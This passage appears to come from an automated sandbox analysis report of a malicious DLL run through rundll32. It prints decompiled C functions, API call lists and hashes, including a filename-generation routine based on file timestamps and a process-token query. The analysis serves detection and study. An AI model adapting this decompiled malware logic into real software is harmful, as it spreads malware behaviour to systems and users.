                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: e7c7f0aee9f6e5e424ffae286dee2cfc18788087be46a2b61bfcbf572414f398
                                                  • Instruction ID: ee66098a3c4ea211bcd6fee571cbf2bbeebdb7c33c676f34f8db40e176500411
                                                  • Opcode Fuzzy Hash: e7c7f0aee9f6e5e424ffae286dee2cfc18788087be46a2b61bfcbf572414f398
                                                  • Instruction Fuzzy Hash: E3F0DA70A24289DBD7189FA9DA8AED67FE4EF14750B448406F906D7250DA30EC41CE69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547A5D6, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E0547A5D6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x547d32c; // 0x73e95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x547d32c; // 0x73e95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x547d32c; // 0x73e95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x547e836) {
					HeapFree( *0x547d238, 0, _t10);
					_t7 =  *0x547d32c; // 0x73e95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                  0x0547a5d6
                                                  0x0547a5df
                                                  0x0547a5ef
                                                  0x0547a5ef
                                                  0x0547a5f4
                                                  0x0547a5f9
                                                  0x00000000
                                                  0x00000000
                                                  0x0547a5e9
                                                  0x0547a5e9
                                                  0x0547a5fb
                                                  0x0547a600
                                                  0x0547a604
                                                  0x0547a617
                                                  0x0547a61d
                                                  0x0547a61d
                                                  0x0547a626
                                                  0x0547a628
                                                  0x0547a62c
                                                  0x0547a632

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(073E9570), ref: 0547A5DF
                                                  • Sleep.KERNEL32(0000000A,?,054723DE), ref: 0547A5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,054723DE), ref: 0547A617
                                                  • RtlLeaveCriticalSection.NTDLL(073E9570), ref: 0547A62C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 56238412c9102371216585be7ba9d12d4d63322f71f5a5e30082ef3063db621a
                                                  • Instruction ID: bb33981ac6c7d630367ad8581177b91ba9c0dbcecc8fe08b9966011ef5c27d79
                                                  • Opcode Fuzzy Hash: 56238412c9102371216585be7ba9d12d4d63322f71f5a5e30082ef3063db621a
                                                  • Instruction Fuzzy Hash: 4BF06774A241489BE71C8F75D99AEDA7FE5EF08705B458056F906DB350CB30EC41CE15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05477F27, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E05477F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E05472049(_t2);
				if(_t34 != 0) {
					_t30 = E05472049(_t28);
					if(_t30 == 0) {
						E05479039(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0547A911(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0547A911(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                  0x05477f27
                                                  0x05477f31
                                                  0x05477f33
                                                  0x05477f39
                                                  0x05477f39
                                                  0x05477f42
                                                  0x05477f46
                                                  0x05477f52
                                                  0x05477f56
                                                  0x05477fca
                                                  0x05477f58
                                                  0x05477f58
                                                  0x05477f5c
                                                  0x05477f63
                                                  0x05477f66
                                                  0x05477f80
                                                  0x05477f6f
                                                  0x05477f6f
                                                  0x05477f73
                                                  0x05477f76
                                                  0x05477f7b
                                                  0x05477f7b
                                                  0x05477f85
                                                  0x05477fad
                                                  0x05477fb3
                                                  0x05477fb6
                                                  0x05477f87
                                                  0x05477f89
                                                  0x05477f91
                                                  0x05477f9c
                                                  0x05477fa1
                                                  0x05477fa1
                                                  0x05477fbd
                                                  0x05477fc4
                                                  0x05477fc5
                                                  0x05477fc5
                                                  0x05477f56
                                                  0x05477fd5

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,054715A4,?,?,?,?,00000102,054711DA,?,?,00000000), ref: 05477F33
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                    • Part of subcall function 0547A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,05477F61,00000000,00000001,00000001,?,?,054715A4,?,?,?,?,00000102), ref: 0547A91F
                                                    • Part of subcall function 0547A911: StrChrA.SHLWAPI(?,0000003F,?,?,054715A4,?,?,?,?,00000102,054711DA,?,?,00000000,00000000), ref: 0547A929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,054715A4,?,?,?,?,00000102,054711DA,?), ref: 05477F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 05477FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 05477FAD
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 9794872e83737d76ae4f538b34af73b92343d67dab2f8bacc0d91ce089bebf82
                                                  • Instruction ID: 9cc36831ca47b3f2b1a35abd3255edc3e84eef50aa0d035b3d63c578a7338bb4
                                                  • Opcode Fuzzy Hash: 9794872e83737d76ae4f538b34af73b92343d67dab2f8bacc0d91ce089bebf82
                                                  • Instruction Fuzzy Hash: 4021D57260825DEBCB129FA6D948AEF7FE9EF06240B45405AF9059B205D735CA0187E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05477CB8, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E05477CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E05472049(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                  0x05477ccd
                                                  0x05477cd1
                                                  0x05477cdb
                                                  0x05477ce2
                                                  0x05477ce5
                                                  0x05477ce7
                                                  0x05477cef
                                                  0x05477cf4
                                                  0x05477d02
                                                  0x05477d07
                                                  0x05477d11

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,073E937C,?,0547747C,004F0053,073E937C,?,?,?,?,?,?,05476814), ref: 05477CC8
                                                  • lstrlenW.KERNEL32(0547747C,?,0547747C,004F0053,073E937C,?,?,?,?,?,?,05476814), ref: 05477CCF
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,0547747C,004F0053,073E937C,?,?,?,?,?,?,05476814), ref: 05477CEF
                                                  • memcpy.NTDLL(751469A0,0547747C,00000002,00000000,004F0053,751469A0,?,?,0547747C,004F0053,073E937C), ref: 05477D02
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: 9076c8e21bad375dd25293e339d4fa83593f2b0e4eec1d029cbe1c7a1af4eca2
                                                  • Instruction ID: 152b0fc2b8060474b4a6040e46ecbf2b339d16be2fc3b45b2ae699bc5027184e
                                                  • Opcode Fuzzy Hash: 9076c8e21bad375dd25293e339d4fa83593f2b0e4eec1d029cbe1c7a1af4eca2
                                                  • Instruction Fuzzy Hash: 42F03C7690011CBB8B11DFA9CC89CDE7BACEF092547014066A908DB211E631EA14CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05473CC8, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(073E87FA,00000000,00000000,74ECC740,0547A453,00000000), ref: 05473CD8
                                                  • lstrlen.KERNEL32(?), ref: 05473CE0
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • lstrcpy.KERNEL32(00000000,073E87FA), ref: 05473CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 05473CFF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: cb1d7689b150f4635795db7361d334f398588241be8c6767844b24834cbfea2a
                                                  • Instruction ID: b3d61fe77ee88c684dba8bc25520bd4241ef95a52162535c38e6b2abb2a8e615
                                                  • Opcode Fuzzy Hash: cb1d7689b150f4635795db7361d334f398588241be8c6767844b24834cbfea2a
                                                  • Instruction Fuzzy Hash: 08E09273915268A787119FE5AC8CCEFBFADFF89611704481BF601E3110DB248D018BE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: rundll32.exe PID: 6832 Parent PID: 1132 rundll32.exeCOMMON

                                                  Executed Functions

                                                  Function 04F412D4, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E04F412D4(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x4f4d278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x4f4d238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x4f4d278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x4f4d238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x4f4d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x4f4d278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x4f4d27c; // 0x212a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x4f4e7f2; // 0x73797325
				_t83 = E04F495B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x4f4d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x4f4d27c; // 0x212a5a8
				_t16 = _t93 + 0x4f4e813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                                  0x04f412dd
                                                  0x04f412e3
                                                  0x04f412e5
                                                  0x04f412ff
                                                  0x04f41303
                                                  0x04f41306
                                                  0x04f4157b
                                                  0x04f41582
                                                  0x04f41582
                                                  0x04f4130c
                                                  0x04f41321
                                                  0x04f41323
                                                  0x04f41327
                                                  0x04f4132a
                                                  0x04f4156b
                                                  0x04f41575
                                                  0x00000000
                                                  0x04f41575
                                                  0x04f41330
                                                  0x04f4133b
                                                  0x04f41340
                                                  0x04f41345
                                                  0x04f41348
                                                  0x04f4134f
                                                  0x04f41356
                                                  0x04f41359
                                                  0x04f4155b
                                                  0x04f41565
                                                  0x00000000
                                                  0x04f41565
                                                  0x04f4136f
                                                  0x04f41373
                                                  0x04f41376
                                                  0x04f41379
                                                  0x04f41381
                                                  0x04f41384
                                                  0x04f4138d
                                                  0x04f41393
                                                  0x04f4139d
                                                  0x04f413a4
                                                  0x04f413a4
                                                  0x04f413b6
                                                  0x04f413c1
                                                  0x04f413cf
                                                  0x04f413d4
                                                  0x04f413d9
                                                  0x04f413dc
                                                  0x04f413e1
                                                  0x04f413eb
                                                  0x04f413ee
                                                  0x04f413f1
                                                  0x04f41407
                                                  0x04f4140b
                                                  0x04f4140e
                                                  0x04f41559
                                                  0x00000000
                                                  0x04f41559
                                                  0x04f41425
                                                  0x04f41476
                                                  0x04f41439
                                                  0x04f41441
                                                  0x04f41446
                                                  0x04f41454
                                                  0x04f4145d
                                                  0x04f41466
                                                  0x04f41466
                                                  0x04f41474
                                                  0x04f41474
                                                  0x04f4147a
                                                  0x04f4147e
                                                  0x04f4147e
                                                  0x04f41484
                                                  0x00000000
                                                  0x00000000
                                                  0x04f41486
                                                  0x04f4148c
                                                  0x04f41533
                                                  0x04f41536
                                                  0x04f41543
                                                  0x04f41543
                                                  0x04f41547
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4153c
                                                  0x04f41540
                                                  0x04f41540
                                                  0x04f41542
                                                  0x04f41542
                                                  0x04f4154c
                                                  0x04f41553
                                                  0x04f41555
                                                  0x00000000
                                                  0x04f41555
                                                  0x04f41492
                                                  0x04f41494
                                                  0x04f41494
                                                  0x04f414a7
                                                  0x04f414ad
                                                  0x04f414b8
                                                  0x04f414ba
                                                  0x04f414be
                                                  0x04f414c0
                                                  0x04f414c0
                                                  0x04f414c5
                                                  0x04f414c7
                                                  0x04f414c7
                                                  0x04f414c5
                                                  0x04f414cc
                                                  0x04f414d0
                                                  0x04f414d0
                                                  0x04f414e0
                                                  0x04f414e5
                                                  0x04f414e8
                                                  0x04f414e8
                                                  0x04f414eb
                                                  0x04f414f5
                                                  0x04f414fd
                                                  0x04f41502
                                                  0x04f41510
                                                  0x04f41510
                                                  0x04f41524
                                                  0x04f41528
                                                  0x04f41528

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04F412FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04F41321
                                                  • memset.NTDLL ref: 04F4133B
                                                    • Part of subcall function 04F495B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04F423E9,63699BCE,04F41354,73797325), ref: 04F495C2
                                                    • Part of subcall function 04F495B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F495DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04F41379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04F4138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04F413A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04F413B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 04F413F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 04F41407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04F41425
                                                  • FindNextFileA.KERNELBASE(04F496C1,?), ref: 04F41439
                                                  • FindClose.KERNEL32(04F496C1), ref: 04F41446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 04F41452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04F41474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 04F414A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 04F414E0
                                                  • FindNextFileA.KERNELBASE(04F496C1,?), ref: 04F414F5
                                                  • FindClose.KERNEL32(04F496C1), ref: 04F41502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 04F4150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04F4151E
                                                  • FindClose.KERNELBASE(04F496C1), ref: 04F41553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04F41565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F41575
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: b30bdee82b7587c3eb0f97128fc7a69d50146f8f19e99282e1aa4427cc8ed681
                                                  • Instruction ID: 0bbd80e18adbaab93608a9e3209f5af8f99938bc833c9ebf987c31d410fbaf14
                                                  • Opcode Fuzzy Hash: b30bdee82b7587c3eb0f97128fc7a69d50146f8f19e99282e1aa4427cc8ed681
                                                  • Instruction Fuzzy Hash: 09816D76D00109EFDF10CFA5EC48AEEBBB9FB94300F114166E505E6250EB35AA85CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F483B7, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E04F483B7(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04F42049(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04F49039(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                  0x04f483c4
                                                  0x04f483c5
                                                  0x04f483c6
                                                  0x04f483c7
                                                  0x04f483c8
                                                  0x04f483cc
                                                  0x04f483d3
                                                  0x04f483e2
                                                  0x04f483e5
                                                  0x04f483e8
                                                  0x04f483ef
                                                  0x04f483f2
                                                  0x04f483f5
                                                  0x04f483f8
                                                  0x04f483fb
                                                  0x04f48406
                                                  0x04f48408
                                                  0x04f48411
                                                  0x04f48419
                                                  0x04f4841b
                                                  0x04f4842d
                                                  0x04f48437
                                                  0x04f4843b
                                                  0x04f4844a
                                                  0x04f4844e
                                                  0x04f48457
                                                  0x04f4845f
                                                  0x04f4845f
                                                  0x04f48461
                                                  0x04f48461
                                                  0x04f48469
                                                  0x04f4846f
                                                  0x04f48473
                                                  0x04f48473
                                                  0x04f4847e

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04F483FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04F48411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F4842D
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F4844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04F48457
                                                  • NtClose.NTDLL(?), ref: 04F48469
                                                  • NtClose.NTDLL(00000000), ref: 04F48473
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 1a500cdd961752f7f4b6e2683622d80f7f5fb4961b3a949c6e4e496879a91f15
                                                  • Instruction ID: 134937f1a62c161092e5ee78bc84d6e0ab6559cfe8ceb9ea0de9a1d328d3f56e
                                                  • Opcode Fuzzy Hash: 1a500cdd961752f7f4b6e2683622d80f7f5fb4961b3a949c6e4e496879a91f15
                                                  • Instruction Fuzzy Hash: C32136B690021CFBDB01AF95DC44ADEBFBDEF98780F114022FA00F6120DB759A419BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F46786, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 83%
                                                  			E04F46786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4f4d240);
					_v20 = 0;
					_v16 = 0;
					L04F4B0C8();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x4f4d26c; // 0x31c
					_v40 = _t51;
